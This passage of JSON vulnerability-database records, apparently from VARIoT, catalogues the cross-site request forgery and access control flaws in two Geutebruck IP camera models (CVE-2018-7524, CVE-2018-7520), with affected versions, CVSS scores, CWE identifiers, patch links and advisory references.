          {
            "db": "IVD",
            "id": "e2e8f6e1-39ab-11e9-ac0f-000c29342cb1"
          },
          {
            "db": "CNVD",
            "id": "CNVD-2018-06021"
          },
          {
            "db": "VULHUB",
            "id": "VHN-137556"
          }
        ],
        "trust": 1.7456349166666667
      },
      "iot_taxonomy": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "category": [
              "IoT",
              "ICS",
              "Network device"
            ],
            "sub_category": null,
            "trust": 0.6
          },
          {
            "category": [
              "ICS"
            ],
            "sub_category": null,
            "trust": 0.2
          }
        ],
        "sources": [
          {
            "db": "IVD",
            "id": "e2e8f6e1-39ab-11e9-ac0f-000c29342cb1"
          },
          {
            "db": "CNVD",
            "id": "CNVD-2018-06021"
          }
        ]
      },
      "last_update_date": "2024-11-23T21:53:17.656000Z",
      "patch": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/patch#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "title": "Top Page",
            "trust": 0.8,
            "url": "https://www.geutebrueck.com/en_EN.html"
          },
          {
            "title": "GeutebruckIPCameras cross-site request forgery vulnerability patch",
            "trust": 0.6,
            "url": "https://www.cnvd.org.cn/patchInfo/show/122843"
          },
          {
            "title": "Geutebr\u00fcck G-Cam/EFD-2250  and Topline TopFD-2125 Fixes for cross-site request forgery vulnerabilities",
            "trust": 0.6,
            "url": "http://www.cnnvd.org.cn/web/xxk/bdxqById.tag?id=79349"
          }
        ],
        "sources": [
          {
            "db": "CNVD",
            "id": "CNVD-2018-06021"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2018-003344"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-201803-763"
          }
        ]
      },
      "problemtype_data": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "problemtype": "CWE-352",
            "trust": 1.9
          }
        ],
        "sources": [
          {
            "db": "VULHUB",
            "id": "VHN-137556"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2018-003344"
          },
          {
            "db": "NVD",
            "id": "CVE-2018-7524"
          }
        ]
      },
      "references": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/references#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "trust": 3.4,
            "url": "https://ics-cert.us-cert.gov/advisories/icsa-18-079-01"
          },
          {
            "trust": 1.7,
            "url": "http://www.securityfocus.com/bid/103474"
          },
          {
            "trust": 0.8,
            "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2018-7524"
          },
          {
            "trust": 0.8,
            "url": "https://nvd.nist.gov/vuln/detail/cve-2018-7524"
          },
          {
            "trust": 0.3,
            "url": "http://www.geutebrueck.com/en_en/product-overview-31934.html"
          }
        ],
        "sources": [
          {
            "db": "CNVD",
            "id": "CNVD-2018-06021"
          },
          {
            "db": "VULHUB",
            "id": "VHN-137556"
          },
          {
            "db": "BID",
            "id": "103474"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2018-003344"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-201803-763"
          },
          {
            "db": "NVD",
            "id": "CVE-2018-7524"
          }
        ]
      },
      "sources": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#",
          "data": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "db": "IVD",
            "id": "e2e8f6e1-39ab-11e9-ac0f-000c29342cb1"
          },
          {
            "db": "CNVD",
            "id": "CNVD-2018-06021"
          },
          {
            "db": "VULHUB",
            "id": "VHN-137556"
          },
          {
            "db": "BID",
            "id": "103474"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2018-003344"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-201803-763"
          },
          {
            "db": "NVD",
            "id": "CVE-2018-7524"
          }
        ]
      },
      "sources_release_date": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
          "data": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "date": "2018-03-22T00:00:00",
            "db": "IVD",
            "id": "e2e8f6e1-39ab-11e9-ac0f-000c29342cb1"
          },
          {
            "date": "2018-03-22T00:00:00",
            "db": "CNVD",
            "id": "CNVD-2018-06021"
          },
          {
            "date": "2018-03-22T00:00:00",
            "db": "VULHUB",
            "id": "VHN-137556"
          },
          {
            "date": "2018-03-20T00:00:00",
            "db": "BID",
            "id": "103474"
          },
          {
            "date": "2018-05-22T00:00:00",
            "db": "JVNDB",
            "id": "JVNDB-2018-003344"
          },
          {
            "date": "2018-03-22T00:00:00",
            "db": "CNNVD",
            "id": "CNNVD-201803-763"
          },
          {
            "date": "2018-03-22T18:29:01.027000",
            "db": "NVD",
            "id": "CVE-2018-7524"
          }
        ]
      },
      "sources_update_date": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
          "data": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "date": "2018-03-22T00:00:00",
            "db": "CNVD",
            "id": "CNVD-2018-06021"
          },
          {
            "date": "2019-10-09T00:00:00",
            "db": "VULHUB",
            "id": "VHN-137556"
          },
          {
            "date": "2018-03-20T00:00:00",
            "db": "BID",
            "id": "103474"
          },
          {
            "date": "2018-05-22T00:00:00",
            "db": "JVNDB",
            "id": "JVNDB-2018-003344"
          },
          {
            "date": "2019-10-17T00:00:00",
            "db": "CNNVD",
            "id": "CNNVD-201803-763"
          },
          {
            "date": "2024-11-21T04:12:17.723000",
            "db": "NVD",
            "id": "CVE-2018-7524"
          }
        ]
      },
      "threat_type": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/threat_type#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "remote",
        "sources": [
          {
            "db": "CNNVD",
            "id": "CNNVD-201803-763"
          }
        ],
        "trust": 0.6
      },
      "title": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/title#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "Geutebruck IP Cameras Cross-Site Request Forgery Vulnerability",
        "sources": [
          {
            "db": "IVD",
            "id": "e2e8f6e1-39ab-11e9-ac0f-000c29342cb1"
          },
          {
            "db": "CNVD",
            "id": "CNVD-2018-06021"
          }
        ],
        "trust": 0.8
      },
      "type": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/type#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "cross-site request forgery",
        "sources": [
          {
            "db": "CNNVD",
            "id": "CNNVD-201803-763"
          }
        ],
        "trust": 0.6
      }
    }

    VAR-201803-2213

    Vulnerability from variot - Updated: 2024-11-23 21:53

    An improper access control vulnerability has been identified in Geutebruck G-Cam/EFD-2250 Version 1.12.0.4 and Topline TopFD-2125 Version 3.15.1 IP cameras, which could allow a full configuration download, including passwords. Geutebruck G-Cam/EFD-2250 and Topline TopFD-2125 contain an access control vulnerability. Information may be obtained or altered, and service operation may be disrupted (DoS). The G-Cam/EFD-2250 and Topline TopFD-2125 are both high-definition cameras from Geutebruck. Multiple Geutebruck devices are prone to the following security vulnerabilities: (1) an authentication-bypass vulnerability; (2) a SQL-injection vulnerability; (3) a cross-site request-forgery vulnerability; (4) an access-bypass vulnerability; (5) a security-bypass vulnerability; (6) a cross-site scripting vulnerability. Attackers may exploit these issues to gain unauthorized access to the affected device; to bypass certain security restrictions and perform unauthorized actions; to compromise the application, access or modify data, and exploit vulnerabilities in the underlying database; to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site; or to execute arbitrary code within the context of the affected device. The following devices are vulnerable: Geutebruck G-Cam/EFD-2250 version 1.12.0.4 and Geutebruck Topline TopFD-2125 version 3.15.1. Geutebrück G-Cam/EFD-2250 and Topline TopFD-2125 are IP camera products of the German company Geutebrück.


    {
      "@context": {
        "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
        "affected_products": {
          "@id": "https://www.variotdbs.pl/ref/affected_products"
        },
        "configurations": {
          "@id": "https://www.variotdbs.pl/ref/configurations"
        },
        "credits": {
          "@id": "https://www.variotdbs.pl/ref/credits"
        },
        "cvss": {
          "@id": "https://www.variotdbs.pl/ref/cvss/"
        },
        "description": {
          "@id": "https://www.variotdbs.pl/ref/description/"
        },
        "exploit_availability": {
          "@id": "https://www.variotdbs.pl/ref/exploit_availability/"
        },
        "external_ids": {
          "@id": "https://www.variotdbs.pl/ref/external_ids/"
        },
        "iot": {
          "@id": "https://www.variotdbs.pl/ref/iot/"
        },
        "iot_taxonomy": {
          "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
        },
        "patch": {
          "@id": "https://www.variotdbs.pl/ref/patch/"
        },
        "problemtype_data": {
          "@id": "https://www.variotdbs.pl/ref/problemtype_data/"
        },
        "references": {
          "@id": "https://www.variotdbs.pl/ref/references/"
        },
        "sources": {
          "@id": "https://www.variotdbs.pl/ref/sources/"
        },
        "sources_release_date": {
          "@id": "https://www.variotdbs.pl/ref/sources_release_date/"
        },
        "sources_update_date": {
          "@id": "https://www.variotdbs.pl/ref/sources_update_date/"
        },
        "threat_type": {
          "@id": "https://www.variotdbs.pl/ref/threat_type/"
        },
        "title": {
          "@id": "https://www.variotdbs.pl/ref/title/"
        },
        "type": {
          "@id": "https://www.variotdbs.pl/ref/type/"
        }
      },
      "@id": "https://www.variotdbs.pl/vuln/VAR-201803-2213",
      "affected_products": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/affected_products#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            },
            "@id": "https://www.variotdbs.pl/ref/sources"
          }
        },
        "data": [
          {
            "model": "g-cam/efd-2250",
            "scope": "eq",
            "trust": 1.7,
            "vendor": "geutebruck",
            "version": "1.12.0.4"
          },
          {
            "model": "topfd-2125",
            "scope": "eq",
            "trust": 1.6,
            "vendor": "geutebrueck",
            "version": "3.15.1"
          },
          {
            "model": "g-cam\\/efd-2250",
            "scope": "eq",
            "trust": 1.6,
            "vendor": "geutebrueck",
            "version": "1.12.0.4"
          },
          {
            "model": "topline topfd-2125",
            "scope": "eq",
            "trust": 0.9,
            "vendor": "geutebruck",
            "version": "3.15.1"
          },
          {
            "model": "topfd-2125",
            "scope": "eq",
            "trust": 0.8,
            "vendor": "geutebruck",
            "version": "3.15.1"
          },
          {
            "model": "g-cam/efd-2250",
            "scope": "ne",
            "trust": 0.3,
            "vendor": "geutebruck",
            "version": "1.12.0.19"
          },
          {
            "model": null,
            "scope": "eq",
            "trust": 0.2,
            "vendor": "g cam efd 2250",
            "version": "1.12.0.4"
          },
          {
            "model": null,
            "scope": "eq",
            "trust": 0.2,
            "vendor": "topfd 2125",
            "version": "3.15.1"
          }
        ],
        "sources": [
          {
            "db": "IVD",
            "id": "e2e8f6e2-39ab-11e9-b0e9-000c29342cb1"
          },
          {
            "db": "CNVD",
            "id": "CNVD-2018-06020"
          },
          {
            "db": "BID",
            "id": "103474"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2018-003343"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-201803-764"
          },
          {
            "db": "NVD",
            "id": "CVE-2018-7520"
          }
        ]
      },
      "configurations": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/configurations#",
          "children": {
            "@container": "@list"
          },
          "cpe_match": {
            "@container": "@list"
          },
          "data": {
            "@container": "@list"
          },
          "nodes": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "CVE_data_version": "4.0",
            "nodes": [
              {
                "cpe_match": [
                  {
                    "cpe22Uri": "cpe:/o:geutebruck:g-cam%2fefd-2250_firmware",
                    "vulnerable": true
                  },
                  {
                    "cpe22Uri": "cpe:/o:geutebruck:topfd-2125_firmware",
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              }
            ]
          }
        ],
        "sources": [
          {
            "db": "JVNDB",
            "id": "JVNDB-2018-003343"
          }
        ]
      },
      "credits": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/credits#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "Davy Douhine of RandoriSec and Nicolas Mattiocco of Greenlock.",
        "sources": [
          {
            "db": "BID",
            "id": "103474"
          }
        ],
        "trust": 0.3
      },
      "cve": "CVE-2018-7520",
      "cvss": {
        "@context": {
          "cvssV2": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
            },
            "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
          },
          "cvssV3": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
            },
            "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
          },
          "severity": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/cvss/severity#"
            },
            "@id": "https://www.variotdbs.pl/ref/cvss/severity"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            },
            "@id": "https://www.variotdbs.pl/ref/sources"
          }
        },
        "data": [
          {
            "cvssV2": [
              {
                "accessComplexity": "LOW",
                "accessVector": "NETWORK",
                "authentication": "NONE",
                "author": "nvd@nist.gov",
                "availabilityImpact": "NONE",
                "baseScore": 5.0,
                "confidentialityImpact": "PARTIAL",
                "exploitabilityScore": 10.0,
                "id": "CVE-2018-7520",
                "impactScore": 2.9,
                "integrityImpact": "NONE",
                "severity": "MEDIUM",
                "trust": 1.0,
                "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N",
                "version": "2.0"
              },
              {
                "acInsufInfo": null,
                "accessComplexity": "Low",
                "accessVector": "Network",
                "authentication": "None",
                "author": "NVD",
                "availabilityImpact": "Partial",
                "baseScore": 7.5,
                "confidentialityImpact": "Partial",
                "exploitabilityScore": null,
                "id": "CVE-2018-7520",
                "impactScore": null,
                "integrityImpact": "Partial",
                "obtainAllPrivilege": null,
                "obtainOtherPrivilege": null,
                "obtainUserPrivilege": null,
                "severity": "High",
                "trust": 0.8,
                "userInteractionRequired": null,
                "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P",
                "version": "2.0"
              },
              {
                "accessComplexity": "LOW",
                "accessVector": "NETWORK",
                "authentication": "NONE",
                "author": "CNVD",
                "availabilityImpact": "COMPLETE",
                "baseScore": 10.0,
                "confidentialityImpact": "COMPLETE",
                "exploitabilityScore": 10.0,
                "id": "CNVD-2018-06020",
                "impactScore": 10.0,
                "integrityImpact": "COMPLETE",
                "severity": "HIGH",
                "trust": 0.6,
                "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C",
                "version": "2.0"
              },
              {
                "accessComplexity": "LOW",
                "accessVector": "NETWORK",
                "authentication": "NONE",
                "author": "IVD",
                "availabilityImpact": "COMPLETE",
                "baseScore": 10.0,
                "confidentialityImpact": "COMPLETE",
                "exploitabilityScore": 10.0,
                "id": "e2e8f6e2-39ab-11e9-b0e9-000c29342cb1",
                "impactScore": 10.0,
                "integrityImpact": "COMPLETE",
                "severity": "HIGH",
                "trust": 0.2,
                "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C",
                "version": "2.9 [IVD]"
              },
              {
                "accessComplexity": "LOW",
                "accessVector": "NETWORK",
                "authentication": "NONE",
                "author": "VULHUB",
                "availabilityImpact": "NONE",
                "baseScore": 5.0,
                "confidentialityImpact": "PARTIAL",
                "exploitabilityScore": 10.0,
                "id": "VHN-137552",
                "impactScore": 2.9,
                "integrityImpact": "NONE",
                "severity": "MEDIUM",
                "trust": 0.1,
                "vectorString": "AV:N/AC:L/AU:N/C:P/I:N/A:N",
                "version": "2.0"
              }
            ],
            "cvssV3": [
              {
                "attackComplexity": "LOW",
                "attackVector": "NETWORK",
                "author": "nvd@nist.gov",
                "availabilityImpact": "HIGH",
                "baseScore": 9.8,
                "baseSeverity": "CRITICAL",
                "confidentialityImpact": "HIGH",
                "exploitabilityScore": 3.9,
                "id": "CVE-2018-7520",
                "impactScore": 5.9,
                "integrityImpact": "HIGH",
                "privilegesRequired": "NONE",
                "scope": "UNCHANGED",
                "trust": 1.0,
                "userInteraction": "NONE",
                "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
                "version": "3.1"
              },
              {
                "attackComplexity": "Low",
                "attackVector": "Network",
                "author": "NVD",
                "availabilityImpact": "High",
                "baseScore": 9.8,
                "baseSeverity": "Critical",
                "confidentialityImpact": "High",
                "exploitabilityScore": null,
                "id": "CVE-2018-7520",
                "impactScore": null,
                "integrityImpact": "High",
                "privilegesRequired": "None",
                "scope": "Unchanged",
                "trust": 0.8,
                "userInteraction": "None",
                "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
                "version": "3.0"
              }
            ],
            "severity": [
              {
                "author": "nvd@nist.gov",
                "id": "CVE-2018-7520",
                "trust": 1.0,
                "value": "CRITICAL"
              },
              {
                "author": "NVD",
                "id": "CVE-2018-7520",
                "trust": 0.8,
                "value": "Critical"
              },
              {
                "author": "CNVD",
                "id": "CNVD-2018-06020",
                "trust": 0.6,
                "value": "HIGH"
              },
              {
                "author": "CNNVD",
                "id": "CNNVD-201803-764",
                "trust": 0.6,
                "value": "CRITICAL"
              },
              {
                "author": "IVD",
                "id": "e2e8f6e2-39ab-11e9-b0e9-000c29342cb1",
                "trust": 0.2,
                "value": "CRITICAL"
              },
              {
                "author": "VULHUB",
                "id": "VHN-137552",
                "trust": 0.1,
                "value": "MEDIUM"
              }
            ]
          }
        ],
        "sources": [
          {
            "db": "IVD",
            "id": "e2e8f6e2-39ab-11e9-b0e9-000c29342cb1"
          },
          {
            "db": "CNVD",
            "id": "CNVD-2018-06020"
          },
          {
            "db": "VULHUB",
            "id": "VHN-137552"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2018-003343"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-201803-764"
          },
          {
            "db": "NVD",
            "id": "CVE-2018-7520"
          }
        ]
      },
      "description": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/description#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "An improper access control vulnerability has been identified in Geutebruck G-Cam/EFD-2250 Version 1.12.0.4 and Topline TopFD-2125 Version 3.15.1 IP cameras, which could allow a full configuration download, including passwords. Geutebruck G-Cam/EFD-2250 and Topline TopFD-2125 Contains an access control vulnerability.Information is obtained, information is altered, and service operation is disrupted (DoS) There is a possibility of being put into a state. The G-Cam/EFD-2250 and ToplineTopFD-2125 are both high-definition cameras from Geutebruck. Multiple Geutebruck devices are prone to the following multiple security vulnerabilities. \n1. An authentication-bypass vulnerability\n2. A SQL-injection vulnerability\n3. A cross-site request-forgery vulnerability\n4. An access-bypass vulnerability\n5. A security-bypass vulnerability\n6. A cross-site scripting vulnerability\nAttackers may exploit these issues to gain unauthorized access to the   affected device, or to bypass certain security restrictions to perform  unauthorized actions, to compromise the application to access or modify  data and to exploit vulnerabilities in the underlying database, to  execute arbitrary script code in the browser of an unsuspecting user in  the context of the affected site or to  execute arbitrary code within  the context of the  affected device. \nThe following devices are vulnerable:\nGeutebruck G-Cam/EFD-2250 version 1.12.0.4\nGeutebruck Topline TopFD-2125 version 3.15.1. Geutebr\u00fcck G-Cam/EFD-2250 and Topline TopFD-2125 are IP camera products of German Geutebr\u00fcck company",
        "sources": [
          {
            "db": "NVD",
            "id": "CVE-2018-7520"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2018-003343"
          },
          {
            "db": "CNVD",
            "id": "CNVD-2018-06020"
          },
          {
            "db": "BID",
            "id": "103474"
          },
          {
            "db": "IVD",
            "id": "e2e8f6e2-39ab-11e9-b0e9-000c29342cb1"
          },
          {
            "db": "VULHUB",
            "id": "VHN-137552"
          }
        ],
        "trust": 2.7
      },
      "exploit_availability": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/exploit_availability#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "reference": "https://www.scap.org.cn/vuln/vhn-137552",
            "trust": 0.1,
            "type": "unknown"
          }
        ],
        "sources": [
          {
            "db": "VULHUB",
            "id": "VHN-137552"
          }
        ]
      },
      "external_ids": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/external_ids#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "db": "NVD",
            "id": "CVE-2018-7520",
            "trust": 3.6
          },
          {
            "db": "ICS CERT",
            "id": "ICSA-18-079-01",
            "trust": 3.4
          },
          {
            "db": "BID",
            "id": "103474",
            "trust": 2.0
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-201803-764",
            "trust": 0.9
          },
          {
            "db": "CNVD",
            "id": "CNVD-2018-06020",
            "trust": 0.8
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2018-003343",
            "trust": 0.8
          },
          {
            "db": "IVD",
            "id": "E2E8F6E2-39AB-11E9-B0E9-000C29342CB1",
            "trust": 0.2
          },
          {
            "db": "PACKETSTORM",
            "id": "148380",
            "trust": 0.1
          },
          {
            "db": "VULHUB",
            "id": "VHN-137552",
            "trust": 0.1
          }
        ],
        "sources": [
          {
            "db": "IVD",
            "id": "e2e8f6e2-39ab-11e9-b0e9-000c29342cb1"
          },
          {
            "db": "CNVD",
            "id": "CNVD-2018-06020"
          },
          {
            "db": "VULHUB",
            "id": "VHN-137552"
          },
          {
            "db": "BID",
            "id": "103474"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2018-003343"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-201803-764"
          },
          {
            "db": "NVD",
            "id": "CVE-2018-7520"
          }
        ]
      },
      "id": "VAR-201803-2213",
      "iot": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/iot#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": true,
        "sources": [
          {
            "db": "IVD",
            "id": "e2e8f6e2-39ab-11e9-b0e9-000c29342cb1"
          },
          {
            "db": "CNVD",
            "id": "CNVD-2018-06020"
          },
          {
            "db": "VULHUB",
            "id": "VHN-137552"
          }
        ],
        "trust": 1.7456349166666667
      },
      "iot_taxonomy": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "category": [
              "IoT",
              "ICS",
              "Network device"
            ],
            "sub_category": null,
            "trust": 0.6
          },
          {
            "category": [
              "ICS"
            ],
            "sub_category": null,
            "trust": 0.2
          }
        ],
        "sources": [
          {
            "db": "IVD",
            "id": "e2e8f6e2-39ab-11e9-b0e9-000c29342cb1"
          },
          {
            "db": "CNVD",
            "id": "CNVD-2018-06020"
          }
        ]
      },
      "last_update_date": "2024-11-23T21:53:17.617000Z",
      "patch": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/patch#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "title": "Top Page",
            "trust": 0.8,
            "url": "https://www.geutebrueck.com/en_EN.html"
          },
          {
            "title": "GeutebruckIPCameras patch for incorrect access control vulnerability",
            "trust": 0.6,
            "url": "https://www.cnvd.org.cn/patchInfo/show/122845"
          },
          {
            "title": "Geutebr\u00fcck G-Cam/EFD-2250  and Topline TopFD-2125 Fixes for access control error vulnerabilities",
            "trust": 0.6,
            "url": "http://www.cnnvd.org.cn/web/xxk/bdxqById.tag?id=79350"
          }
        ],
        "sources": [
          {
            "db": "CNVD",
            "id": "CNVD-2018-06020"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2018-003343"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-201803-764"
          }
        ]
      },
      "problemtype_data": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "problemtype": "CWE-284",
            "trust": 1.9
          },
          {
            "problemtype": "NVD-CWE-Other",
            "trust": 1.0
          }
        ],
        "sources": [
          {
            "db": "VULHUB",
            "id": "VHN-137552"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2018-003343"
          },
          {
            "db": "NVD",
            "id": "CVE-2018-7520"
          }
        ]
      },
      "references": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/references#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "trust": 3.4,
            "url": "https://ics-cert.us-cert.gov/advisories/icsa-18-079-01"
          },
          {
            "trust": 1.7,
            "url": "http://www.securityfocus.com/bid/103474"
          },
          {
            "trust": 0.8,
            "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2018-7520"
          },
          {
            "trust": 0.8,
            "url": "https://nvd.nist.gov/vuln/detail/cve-2018-7520"
          },
          {
            "trust": 0.3,
            "url": "http://www.geutebrueck.com/en_en/product-overview-31934.html"
          }
        ],
        "sources": [
          {
            "db": "CNVD",
            "id": "CNVD-2018-06020"
          },
          {
            "db": "VULHUB",
            "id": "VHN-137552"
          },
          {
            "db": "BID",
            "id": "103474"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2018-003343"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-201803-764"
          },
          {
            "db": "NVD",
            "id": "CVE-2018-7520"
          }
        ]
      },
      "sources": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#",
          "data": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "db": "IVD",
            "id": "e2e8f6e2-39ab-11e9-b0e9-000c29342cb1"
          },
          {
            "db": "CNVD",
            "id": "CNVD-2018-06020"
          },
          {
            "db": "VULHUB",
            "id": "VHN-137552"
          },
          {
            "db": "BID",
            "id": "103474"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2018-003343"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-201803-764"
          },
          {
            "db": "NVD",
            "id": "CVE-2018-7520"
          }
        ]
      },
      "sources_release_date": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
          "data": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "date": "2018-03-22T00:00:00",
            "db": "IVD",
            "id": "e2e8f6e2-39ab-11e9-b0e9-000c29342cb1"
          },
          {
            "date": "2018-03-22T00:00:00",
            "db": "CNVD",
            "id": "CNVD-2018-06020"
          },
          {
            "date": "2018-03-22T00:00:00",
            "db": "VULHUB",
            "id": "VHN-137552"
          },
          {
            "date": "2018-03-20T00:00:00",
            "db": "BID",
            "id": "103474"
          },
          {
            "date": "2018-05-22T00:00:00",
            "db": "JVNDB",
            "id": "JVNDB-2018-003343"
          },
          {
            "date": "2018-03-22T00:00:00",
            "db": "CNNVD",
            "id": "CNNVD-201803-764"
          },
          {
            "date": "2018-03-22T18:29:00.963000",
            "db": "NVD",
            "id": "CVE-2018-7520"
          }
        ]
      },
      "sources_update_date": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
          "data": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "date": "2018-03-22T00:00:00",
            "db": "CNVD",
            "id": "CNVD-2018-06020"
          },
          {
            "date": "2020-10-02T00:00:00",
            "db": "VULHUB",
            "id": "VHN-137552"
          },
          {
            "date": "2018-03-20T00:00:00",
            "db": "BID",
            "id": "103474"
          },
          {
            "date": "2018-05-22T00:00:00",
            "db": "JVNDB",
            "id": "JVNDB-2018-003343"
          },
          {
            "date": "2020-10-09T00:00:00",
            "db": "CNNVD",
            "id": "CNNVD-201803-764"
          },
          {
            "date": "2024-11-21T04:12:17.273000",
            "db": "NVD",
            "id": "CVE-2018-7520"
          }
        ]
      },
      "threat_type": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/threat_type#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "remote",
        "sources": [
          {
            "db": "CNNVD",
            "id": "CNNVD-201803-764"
          }
        ],
        "trust": 0.6
      },
      "title": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/title#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
